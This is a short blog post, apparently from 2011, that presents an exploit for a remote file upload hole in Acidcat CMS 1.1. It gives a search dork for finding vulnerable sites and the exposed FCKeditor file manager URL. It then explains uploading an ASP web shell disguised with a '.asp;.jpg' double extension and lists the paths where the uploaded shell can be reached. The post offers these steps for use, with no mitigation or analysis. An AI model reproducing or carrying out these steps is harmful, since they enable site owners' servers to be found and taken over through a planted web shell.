Senin, 07 Maret 2011

1.1 Remote File Upload Vulnerability

[»] Dork    :  [ "Powered by Acidcat CMS " ]
 
===[ Exploit ]===
[»] http://server/admin/fckeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/asp/connector.asp
 
[»] asp renamed via the .asp;.jpg (shell.asp;.jpg)
 
===[ Upload To ]===
 
[»] http://server/read_write/file/[Shell]
 
[»] http://server/public/File/[Shell]

 
blogger templates